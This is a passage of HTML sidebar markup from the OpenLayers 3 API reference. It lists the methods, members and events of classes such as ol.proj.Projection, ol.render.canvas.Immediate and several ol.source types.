<a href="ol.layer.Vector.html#setVisible">setVisible</a>
</li>
<li data-name="ol.layer.Vector#un" class="">
<a href="ol.layer.Vector.html#un">un</a>
</li>
<li data-name="ol.layer.Vector#unByKey" class="">
<a href="ol.layer.Vector.html#unByKey">unByKey</a>
</li>
<li data-name="ol.layer.Vector#unset" class="">
<a href="ol.layer.Vector.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:change:brightness" class="unstable">
change:brightness
</li>
<li data-name="ol.ObjectEvent#event:change:contrast" class="unstable">
change:contrast
</li>
<li data-name="ol.ObjectEvent#event:change:extent" class="unstable">
change:extent
</li>
<li data-name="ol.ObjectEvent#event:change:hue" class="unstable">
change:hue
</li>
<li data-name="ol.ObjectEvent#event:change:maxResolution" class="unstable">
change:maxResolution
</li>
<li data-name="ol.ObjectEvent#event:change:minResolution" class="unstable">
change:minResolution
</li>
<li data-name="ol.ObjectEvent#event:change:opacity" class="unstable">
change:opacity
</li>
<li data-name="ol.ObjectEvent#event:change:saturation" class="unstable">
change:saturation
</li>
<li data-name="ol.ObjectEvent#event:change:source" class="unstable">
change:source
</li>
<li data-name="ol.ObjectEvent#event:change:visible" class="unstable">
change:visible
</li>
<li data-name="ol.render.Event#event:postcompose" class="unstable">
<a href="ol.render.Event.html#event:postcompose">postcompose</a>
</li>
<li data-name="ol.render.Event#event:precompose" class="unstable">
<a href="ol.render.Event.html#event:precompose">precompose</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.render.Event#event:render" class="unstable">
<a href="ol.render.Event.html#event:render">render</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.loadingstrategy">
<span class="title">
<a href="ol.loadingstrategy.html">ol.loadingstrategy</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.loadingstrategy.all" class="unstable">
<a href="ol.loadingstrategy.html#all">all</a>
</li>
<li data-name="ol.loadingstrategy.bbox" class="unstable">
<a href="ol.loadingstrategy.html#bbox">bbox</a>
</li>
<li data-name="ol.loadingstrategy.tile" class="unstable">
<a href="ol.loadingstrategy.html#tile">tile</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.proj">
<span class="title">
<a href="ol.proj.html">ol.proj</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.proj.METERS_PER_UNIT"><a href="ol.proj.html#METERS_PER_UNIT">METERS_PER_UNIT</a></li>
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.proj.ProjectionLike" class="">
<a href="ol.proj.html#ProjectionLike">ProjectionLike</a>
</li>
<li data-name="ol.proj.Units" class="">
<a href="ol.proj.html#Units">Units</a>
</li>
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.proj.addCoordinateTransforms" class="">
<a href="ol.proj.html#addCoordinateTransforms">addCoordinateTransforms</a>
</li>
<li data-name="ol.proj.addEquivalentProjections" class="unstable">
<a href="ol.proj.html#addEquivalentProjections">addEquivalentProjections</a>
</li>
<li data-name="ol.proj.addProjection" class="">
<a href="ol.proj.html#addProjection">addProjection</a>
</li>
<li data-name="ol.proj.fromLonLat" class="">
<a href="ol.proj.html#fromLonLat">fromLonLat</a>
</li>
<li data-name="ol.proj.get" class="">
<a href="ol.proj.html#get">get</a>
</li>
<li data-name="ol.proj.getTransform" class="">
<a href="ol.proj.html#getTransform">getTransform</a>
</li>
<li data-name="ol.proj.toLonLat" class="">
<a href="ol.proj.html#toLonLat">toLonLat</a>
</li>
<li data-name="ol.proj.transform" class="">
<a href="ol.proj.html#transform">transform</a>
</li>
<li data-name="ol.proj.transformExtent" class="">
<a href="ol.proj.html#transformExtent">transformExtent</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.proj.Projection">
<span class="title">
<a href="ol.proj.Projection.html">ol.proj.Projection</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.proj.Projection#getCode" class="">
<a href="ol.proj.Projection.html#getCode">getCode</a>
</li>
<li data-name="ol.proj.Projection#getExtent" class="">
<a href="ol.proj.Projection.html#getExtent">getExtent</a>
</li>
<li data-name="ol.proj.Projection#getMetersPerUnit" class="">
<a href="ol.proj.Projection.html#getMetersPerUnit">getMetersPerUnit</a>
</li>
<li data-name="ol.proj.Projection#getPointResolution" class="unstable">
<a href="ol.proj.Projection.html#getPointResolution">getPointResolution</a>
</li>
<li data-name="ol.proj.Projection#getUnits" class="">
<a href="ol.proj.Projection.html#getUnits">getUnits</a>
</li>
<li data-name="ol.proj.Projection#getWorldExtent" class="unstable">
<a href="ol.proj.Projection.html#getWorldExtent">getWorldExtent</a>
</li>
<li data-name="ol.proj.Projection#isGlobal" class="">
<a href="ol.proj.Projection.html#isGlobal">isGlobal</a>
</li>
<li data-name="ol.proj.Projection#setExtent" class="">
<a href="ol.proj.Projection.html#setExtent">setExtent</a>
</li>
<li data-name="ol.proj.Projection#setGetPointResolution" class="unstable">
<a href="ol.proj.Projection.html#setGetPointResolution">setGetPointResolution</a>
</li>
<li data-name="ol.proj.Projection#setGlobal" class="">
<a href="ol.proj.Projection.html#setGlobal">setGlobal</a>
</li>
<li data-name="ol.proj.Projection#setWorldExtent" class="unstable">
<a href="ol.proj.Projection.html#setWorldExtent">setWorldExtent</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.render">
<span class="title">
<a href="ol.render.html">ol.render</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.render.Event">
<span class="title">
<a href="ol.render.Event.html">ol.render.Event</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.render.Event#context"><a href="ol.render.Event.html#context">context</a></li>
<li data-name="ol.render.Event#frameState"><a href="ol.render.Event.html#frameState">frameState</a></li>
<li data-name="ol.render.Event#glContext"><a href="ol.render.Event.html#glContext">glContext</a></li>
<li data-name="ol.render.Event#vectorContext"><a href="ol.render.Event.html#vectorContext">vectorContext</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.render.VectorContext">
<span class="title">
<a href="ol.render.VectorContext.html">ol.render.VectorContext</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.render.canvas">
<span class="title">
<a href="ol.render.canvas.html">ol.render.canvas</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.render.canvas.Immediate">
<span class="title">
<a href="ol.render.canvas.Immediate.html">ol.render.canvas.Immediate</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.render.canvas.Immediate#drawAsync" class="unstable">
<a href="ol.render.canvas.Immediate.html#drawAsync">drawAsync</a>
</li>
<li data-name="ol.render.canvas.Immediate#drawCircleGeometry" class="unstable">
<a href="ol.render.canvas.Immediate.html#drawCircleGeometry">drawCircleGeometry</a>
</li>
<li data-name="ol.render.canvas.Immediate#drawFeature" class="unstable">
<a href="ol.render.canvas.Immediate.html#drawFeature">drawFeature</a>
</li>
<li data-name="ol.render.canvas.Immediate#drawLineStringGeometry" class="unstable">
<a href="ol.render.canvas.Immediate.html#drawLineStringGeometry">drawLineStringGeometry</a>
</li>
<li data-name="ol.render.canvas.Immediate#drawMultiLineStringGeometry" class="unstable">
<a href="ol.render.canvas.Immediate.html#drawMultiLineStringGeometry">drawMultiLineStringGeometry</a>
</li>
<li data-name="ol.render.canvas.Immediate#drawMultiPointGeometry" class="unstable">
<a href="ol.render.canvas.Immediate.html#drawMultiPointGeometry">drawMultiPointGeometry</a>
</li>
<li data-name="ol.render.canvas.Immediate#drawMultiPolygonGeometry" class="unstable">
<a href="ol.render.canvas.Immediate.html#drawMultiPolygonGeometry">drawMultiPolygonGeometry</a>
</li>
<li data-name="ol.render.canvas.Immediate#drawPointGeometry" class="unstable">
<a href="ol.render.canvas.Immediate.html#drawPointGeometry">drawPointGeometry</a>
</li>
<li data-name="ol.render.canvas.Immediate#drawPolygonGeometry" class="unstable">
<a href="ol.render.canvas.Immediate.html#drawPolygonGeometry">drawPolygonGeometry</a>
</li>
<li data-name="ol.render.canvas.Immediate#setFillStrokeStyle" class="unstable">
<a href="ol.render.canvas.Immediate.html#setFillStrokeStyle">setFillStrokeStyle</a>
</li>
<li data-name="ol.render.canvas.Immediate#setImageStyle" class="unstable">
<a href="ol.render.canvas.Immediate.html#setImageStyle">setImageStyle</a>
</li>
<li data-name="ol.render.canvas.Immediate#setTextStyle" class="unstable">
<a href="ol.render.canvas.Immediate.html#setTextStyle">setTextStyle</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.render.webgl.Immediate">
<span class="title">
<a href="ol.render.webgl.Immediate.html">ol.render.webgl.Immediate</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.render.webgl.Immediate#drawCircleGeometry"><a href="ol.render.webgl.Immediate.html#drawCircleGeometry">drawCircleGeometry</a></li>
<li data-name="ol.render.webgl.Immediate#drawFeature"><a href="ol.render.webgl.Immediate.html#drawFeature">drawFeature</a></li>
<li data-name="ol.render.webgl.Immediate#drawGeometryCollectionGeometry"><a href="ol.render.webgl.Immediate.html#drawGeometryCollectionGeometry">drawGeometryCollectionGeometry</a></li>
<li data-name="ol.render.webgl.Immediate#drawLineStringGeometry"><a href="ol.render.webgl.Immediate.html#drawLineStringGeometry">drawLineStringGeometry</a></li>
<li data-name="ol.render.webgl.Immediate#drawMultiLineStringGeometry"><a href="ol.render.webgl.Immediate.html#drawMultiLineStringGeometry">drawMultiLineStringGeometry</a></li>
<li data-name="ol.render.webgl.Immediate#drawMultiPointGeometry"><a href="ol.render.webgl.Immediate.html#drawMultiPointGeometry">drawMultiPointGeometry</a></li>
<li data-name="ol.render.webgl.Immediate#drawMultiPolygonGeometry"><a href="ol.render.webgl.Immediate.html#drawMultiPolygonGeometry">drawMultiPolygonGeometry</a></li>
<li data-name="ol.render.webgl.Immediate#drawPointGeometry"><a href="ol.render.webgl.Immediate.html#drawPointGeometry">drawPointGeometry</a></li>
<li data-name="ol.render.webgl.Immediate#drawPolygonGeometry"><a href="ol.render.webgl.Immediate.html#drawPolygonGeometry">drawPolygonGeometry</a></li>
<li data-name="ol.render.webgl.Immediate#drawText"><a href="ol.render.webgl.Immediate.html#drawText">drawText</a></li>
<li data-name="ol.render.webgl.Immediate#setFillStrokeStyle"><a href="ol.render.webgl.Immediate.html#setFillStrokeStyle">setFillStrokeStyle</a></li>
<li data-name="ol.render.webgl.Immediate#setImageStyle"><a href="ol.render.webgl.Immediate.html#setImageStyle">setImageStyle</a></li>
<li data-name="ol.render.webgl.Immediate#setTextStyle"><a href="ol.render.webgl.Immediate.html#setTextStyle">setTextStyle</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.render.webgl.Immediate#drawAsync" class="unstable">
<a href="ol.render.webgl.Immediate.html#drawAsync">drawAsync</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.source">
<span class="title">
<a href="ol.source.html">ol.source</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.source.State" class="unstable">
<a href="ol.source.html#State">State</a>
</li>
<li data-name="ol.source.WMTSRequestEncoding" class="unstable">
<a href="ol.source.html#WMTSRequestEncoding">WMTSRequestEncoding</a>
</li>
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.source.BingMaps">
<span class="title">
<a href="ol.source.BingMaps.html">ol.source.BingMaps</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.source.BingMaps.TOS_ATTRIBUTION"><a href="ol.source.BingMaps.html#TOS_ATTRIBUTION">TOS_ATTRIBUTION</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.BingMaps#changed" class="unstable">
<a href="ol.source.BingMaps.html#changed">changed</a>
</li>
<li data-name="ol.source.BingMaps#get" class="">
<a href="ol.source.BingMaps.html#get">get</a>
</li>
<li data-name="ol.source.BingMaps#getAttributions" class="">
<a href="ol.source.BingMaps.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.BingMaps#getKeys" class="">
<a href="ol.source.BingMaps.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.BingMaps#getLogo" class="">
<a href="ol.source.BingMaps.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.BingMaps#getProjection" class="unstable">
<a href="ol.source.BingMaps.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.BingMaps#getProperties" class="">
<a href="ol.source.BingMaps.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.BingMaps#getRevision" class="unstable">
<a href="ol.source.BingMaps.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.BingMaps#getState" class="unstable">
<a href="ol.source.BingMaps.html#getState">getState</a>
</li>
<li data-name="ol.source.BingMaps#getTileGrid" class="">
<a href="ol.source.BingMaps.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.BingMaps#getTileLoadFunction" class="unstable">
<a href="ol.source.BingMaps.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.BingMaps#getTileUrlFunction" class="unstable">
<a href="ol.source.BingMaps.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.BingMaps#on" class="">
<a href="ol.source.BingMaps.html#on">on</a>
</li>
<li data-name="ol.source.BingMaps#once" class="">
<a href="ol.source.BingMaps.html#once">once</a>
</li>
<li data-name="ol.source.BingMaps#set" class="">
<a href="ol.source.BingMaps.html#set">set</a>
</li>
<li data-name="ol.source.BingMaps#setProperties" class="">
<a href="ol.source.BingMaps.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.BingMaps#setTileLoadFunction" class="unstable">
<a href="ol.source.BingMaps.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.BingMaps#setTileUrlFunction" class="unstable">
<a href="ol.source.BingMaps.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.BingMaps#un" class="">
<a href="ol.source.BingMaps.html#un">un</a>
</li>
<li data-name="ol.source.BingMaps#unByKey" class="">
<a href="ol.source.BingMaps.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.BingMaps#unset" class="">
<a href="ol.source.BingMaps.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.Cluster">
<span class="title">
<a href="ol.source.Cluster.html">ol.source.Cluster</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.Cluster#addFeature" class="">
<a href="ol.source.Cluster.html#addFeature">addFeature</a>
</li>
<li data-name="ol.source.Cluster#addFeatures" class="">
<a href="ol.source.Cluster.html#addFeatures">addFeatures</a>
</li>
<li data-name="ol.source.Cluster#changed" class="unstable">
<a href="ol.source.Cluster.html#changed">changed</a>
</li>
<li data-name="ol.source.Cluster#clear" class="">
<a href="ol.source.Cluster.html#clear">clear</a>
</li>
<li data-name="ol.source.Cluster#forEachFeature" class="">
<a href="ol.source.Cluster.html#forEachFeature">forEachFeature</a>
</li>
<li data-name="ol.source.Cluster#forEachFeatureInExtent" class="unstable">
<a href="ol.source.Cluster.html#forEachFeatureInExtent">forEachFeatureInExtent</a>
</li>
<li data-name="ol.source.Cluster#forEachFeatureIntersectingExtent" class="unstable">
<a href="ol.source.Cluster.html#forEachFeatureIntersectingExtent">forEachFeatureIntersectingExtent</a>
</li>
<li data-name="ol.source.Cluster#get" class="">
<a href="ol.source.Cluster.html#get">get</a>
</li>
<li data-name="ol.source.Cluster#getAttributions" class="">
<a href="ol.source.Cluster.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.Cluster#getClosestFeatureToCoordinate" class="">
<a href="ol.source.Cluster.html#getClosestFeatureToCoordinate">getClosestFeatureToCoordinate</a>
</li>
<li data-name="ol.source.Cluster#getExtent" class="">
<a href="ol.source.Cluster.html#getExtent">getExtent</a>
</li>
<li data-name="ol.source.Cluster#getFeatureById" class="">
<a href="ol.source.Cluster.html#getFeatureById">getFeatureById</a>
</li>
<li data-name="ol.source.Cluster#getFeatures" class="">
<a href="ol.source.Cluster.html#getFeatures">getFeatures</a>
</li>
<li data-name="ol.source.Cluster#getFeaturesAtCoordinate" class="">
<a href="ol.source.Cluster.html#getFeaturesAtCoordinate">getFeaturesAtCoordinate</a>
</li>
<li data-name="ol.source.Cluster#getFeaturesCollection" class="unstable">
<a href="ol.source.Cluster.html#getFeaturesCollection">getFeaturesCollection</a>
</li>
<li data-name="ol.source.Cluster#getFeaturesInExtent" class="unstable">
<a href="ol.source.Cluster.html#getFeaturesInExtent">getFeaturesInExtent</a>
</li>
<li data-name="ol.source.Cluster#getKeys" class="">
<a href="ol.source.Cluster.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.Cluster#getLogo" class="">
<a href="ol.source.Cluster.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.Cluster#getProjection" class="unstable">
<a href="ol.source.Cluster.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.Cluster#getProperties" class="">
<a href="ol.source.Cluster.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.Cluster#getRevision" class="unstable">
<a href="ol.source.Cluster.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.Cluster#getSource" class="unstable">
<a href="ol.source.Cluster.html#getSource">getSource</a>
</li>
<li data-name="ol.source.Cluster#getState" class="unstable">
<a href="ol.source.Cluster.html#getState">getState</a>
</li>
<li data-name="ol.source.Cluster#on" class="">
<a href="ol.source.Cluster.html#on">on</a>
</li>
<li data-name="ol.source.Cluster#once" class="">
<a href="ol.source.Cluster.html#once">once</a>
</li>
<li data-name="ol.source.Cluster#removeFeature" class="">
<a href="ol.source.Cluster.html#removeFeature">removeFeature</a>
</li>
<li data-name="ol.source.Cluster#set" class="">
<a href="ol.source.Cluster.html#set">set</a>
</li>
<li data-name="ol.source.Cluster#setProperties" class="">
<a href="ol.source.Cluster.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.Cluster#un" class="">
<a href="ol.source.Cluster.html#un">un</a>
</li>
<li data-name="ol.source.Cluster#unByKey" class="">
<a href="ol.source.Cluster.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.Cluster#unset" class="">
<a href="ol.source.Cluster.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.source.VectorEvent#event:addfeature" class="">
<a href="ol.source.VectorEvent.html#event:addfeature">addfeature</a>
</li>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.source.VectorEvent#event:changefeature" class="unstable">
<a href="ol.source.VectorEvent.html#event:changefeature">changefeature</a>
</li>
<li data-name="ol.source.VectorEvent#event:clear" class="unstable">
<a href="ol.source.VectorEvent.html#event:clear">clear</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.VectorEvent#event:removefeature" class="">
<a href="ol.source.VectorEvent.html#event:removefeature">removefeature</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.Image">
<span class="title">
<a href="ol.source.Image.html">ol.source.Image</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.Image#changed" class="unstable">
<a href="ol.source.Image.html#changed">changed</a>
</li>
<li data-name="ol.source.Image#get" class="">
<a href="ol.source.Image.html#get">get</a>
</li>
<li data-name="ol.source.Image#getAttributions" class="">
<a href="ol.source.Image.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.Image#getKeys" class="">
<a href="ol.source.Image.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.Image#getLogo" class="">
<a href="ol.source.Image.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.Image#getProjection" class="unstable">
<a href="ol.source.Image.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.Image#getProperties" class="">
<a href="ol.source.Image.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.Image#getRevision" class="unstable">
<a href="ol.source.Image.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.Image#getState" class="unstable">
<a href="ol.source.Image.html#getState">getState</a>
</li>
<li data-name="ol.source.Image#on" class="">
<a href="ol.source.Image.html#on">on</a>
</li>
<li data-name="ol.source.Image#once" class="">
<a href="ol.source.Image.html#once">once</a>
</li>
<li data-name="ol.source.Image#set" class="">
<a href="ol.source.Image.html#set">set</a>
</li>
<li data-name="ol.source.Image#setProperties" class="">
<a href="ol.source.Image.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.Image#un" class="">
<a href="ol.source.Image.html#un">un</a>
</li>
<li data-name="ol.source.Image#unByKey" class="">
<a href="ol.source.Image.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.Image#unset" class="">
<a href="ol.source.Image.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.ImageCanvas">
<span class="title">
<a href="ol.source.ImageCanvas.html">ol.source.ImageCanvas</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.ImageCanvas#changed" class="unstable">
<a href="ol.source.ImageCanvas.html#changed">changed</a>
</li>
<li data-name="ol.source.ImageCanvas#get" class="">
<a href="ol.source.ImageCanvas.html#get">get</a>
</li>
<li data-name="ol.source.ImageCanvas#getAttributions" class="">
<a href="ol.source.ImageCanvas.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.ImageCanvas#getKeys" class="">
<a href="ol.source.ImageCanvas.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.ImageCanvas#getLogo" class="">
<a href="ol.source.ImageCanvas.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.ImageCanvas#getProjection" class="unstable">
<a href="ol.source.ImageCanvas.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.ImageCanvas#getProperties" class="">
<a href="ol.source.ImageCanvas.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.ImageCanvas#getRevision" class="unstable">
<a href="ol.source.ImageCanvas.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.ImageCanvas#getState" class="unstable">
<a href="ol.source.ImageCanvas.html#getState">getState</a>
</li>
<li data-name="ol.source.ImageCanvas#on" class="">
<a href="ol.source.ImageCanvas.html#on">on</a>
</li>
<li data-name="ol.source.ImageCanvas#once" class="">
<a href="ol.source.ImageCanvas.html#once">once</a>
</li>
<li data-name="ol.source.ImageCanvas#set" class="">
<a href="ol.source.ImageCanvas.html#set">set</a>
</li>
<li data-name="ol.source.ImageCanvas#setProperties" class="">
<a href="ol.source.ImageCanvas.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.ImageCanvas#un" class="">
<a href="ol.source.ImageCanvas.html#un">un</a>
</li>
<li data-name="ol.source.ImageCanvas#unByKey" class="">
<a href="ol.source.ImageCanvas.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.ImageCanvas#unset" class="">
<a href="ol.source.ImageCanvas.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.ImageEvent">
<span class="title">
<a href="ol.source.ImageEvent.html">ol.source.ImageEvent</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.source.ImageEvent#image"><a href="ol.source.ImageEvent.html#image">image</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.source.ImageMapGuide">
<span class="title">
<a href="ol.source.ImageMapGuide.html">ol.source.ImageMapGuide</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.ImageMapGuide#changed" class="unstable">
<a href="ol.source.ImageMapGuide.html#changed">changed</a>
</li>
<li data-name="ol.source.ImageMapGuide#get" class="">
<a href="ol.source.ImageMapGuide.html#get">get</a>
</li>
<li data-name="ol.source.ImageMapGuide#getAttributions" class="">
<a href="ol.source.ImageMapGuide.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.ImageMapGuide#getImageLoadFunction" class="unstable">
<a href="ol.source.ImageMapGuide.html#getImageLoadFunction">getImageLoadFunction</a>
</li>
<li data-name="ol.source.ImageMapGuide#getKeys" class="">
<a href="ol.source.ImageMapGuide.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.ImageMapGuide#getLogo" class="">
<a href="ol.source.ImageMapGuide.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.ImageMapGuide#getParams" class="">
<a href="ol.source.ImageMapGuide.html#getParams">getParams</a>
</li>
<li data-name="ol.source.ImageMapGuide#getProjection" class="unstable">
<a href="ol.source.ImageMapGuide.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.ImageMapGuide#getProperties" class="">
<a href="ol.source.ImageMapGuide.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.ImageMapGuide#getRevision" class="unstable">
<a href="ol.source.ImageMapGuide.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.ImageMapGuide#getState" class="unstable">
<a href="ol.source.ImageMapGuide.html#getState">getState</a>
</li>
<li data-name="ol.source.ImageMapGuide#on" class="">
<a href="ol.source.ImageMapGuide.html#on">on</a>
</li>
<li data-name="ol.source.ImageMapGuide#once" class="">
<a href="ol.source.ImageMapGuide.html#once">once</a>
</li>
<li data-name="ol.source.ImageMapGuide#set" class="">
<a href="ol.source.ImageMapGuide.html#set">set</a>
</li>
<li data-name="ol.source.ImageMapGuide#setImageLoadFunction" class="unstable">
<a href="ol.source.ImageMapGuide.html#setImageLoadFunction">setImageLoadFunction</a>
</li>
<li data-name="ol.source.ImageMapGuide#setProperties" class="">
<a href="ol.source.ImageMapGuide.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.ImageMapGuide#un" class="">
<a href="ol.source.ImageMapGuide.html#un">un</a>
</li>
<li data-name="ol.source.ImageMapGuide#unByKey" class="">
<a href="ol.source.ImageMapGuide.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.ImageMapGuide#unset" class="">
<a href="ol.source.ImageMapGuide.html#unset">unset</a>
</li>
<li data-name="ol.source.ImageMapGuide#updateParams" class="">
<a href="ol.source.ImageMapGuide.html#updateParams">updateParams</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.source.ImageEvent#event:imageloadend" class="unstable">
<a href="ol.source.ImageEvent.html#event:imageloadend">imageloadend</a>
</li>
<li data-name="ol.source.ImageEvent#event:imageloaderror" class="unstable">
<a href="ol.source.ImageEvent.html#event:imageloaderror">imageloaderror</a>
</li>
